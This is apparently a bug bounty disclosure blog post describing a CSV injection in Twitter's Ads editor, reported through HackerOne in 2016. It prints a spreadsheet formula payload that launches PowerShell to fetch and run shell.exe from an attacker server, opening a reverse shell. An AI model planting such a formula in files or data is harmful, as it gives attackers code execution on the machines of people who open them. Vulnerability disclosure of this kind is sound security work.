Twitter CSV Injection - Going beyond Pop-Up Calculator to Taking Meterpreter Shell

Hi folks,

After a long time, I thought of publishing one of my findings. Back in time, I targeted `Twitter` Application in a hope of getting some juicy bugs.  This time I was looking into searching for some different bugs apart from looking up for XSS, SQLi etc.

tl;dr - this vulnerability is exploiting CSV injection, to gain meterpreter session on a victim's local system.

How it started :- 

I was testing one of the twitter features called ‘Ads editor’.
According to twitter, with Ads editor, you can leverage the power of Excel to manage your campaigns at scale.  That sounds cool as it is using a feature like ‘Excel’.  Also there is an option under Edit access to account in which the account admin can add different users and assign the role accordingly [Roles are: - Account Administrator, Ad Manager and Analyst ]

By this time I was pretty clear to check out "CSV Injection Attack".

Proof of Concept :- 

I noticed that the `Name your audience` field was vulnerable to CSV injection that could be chained with a meterpreter payload resulting in client side remote code execution.

I sent this bug report with all the details to the Twitter security team

And I got the below revert

But wait


I created a video POC containing full exploitation in which I was able to take reverse shell connection back to the attacker's machine by using
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0

Click here for Direct Video Link

Above payload works in such a way that when the CSV file is opened, powershell is launched in the background which attempts to grab the Powersploit payload of Invoke-Shellcode to attempt a reverse shell connection back to the attacker's server.

Well, what next..

This is how the life of a bug hunter looks like.

Moral Of The Story:- 
I never tried going beyond Pop-Up Calculator whenever I submitted bugs related to CSV injection, but this gave me an opportunity to exploit. So on a positive note, accept the things and then move on. And most importantly, if you fail? Well, try harder!


Vulnerability timeline:

Aug 14, 2016   : Reported to Twitter Security Team via Hackerone platform.
Aug 17, 2016  :  Report marked as "Duplicate"
Aug 17, 2016  :  Report reopen and status changed to "Need More Info"
Aug 17, 2016  :  Shared the video POC exploit.
Aug 23, 2016  :  Report again marked as "Duplicate"
June 23, 2017 :  As per Hackerone Policy Responsible disclosure.

Share this

Related Posts

Next Post »


Write comments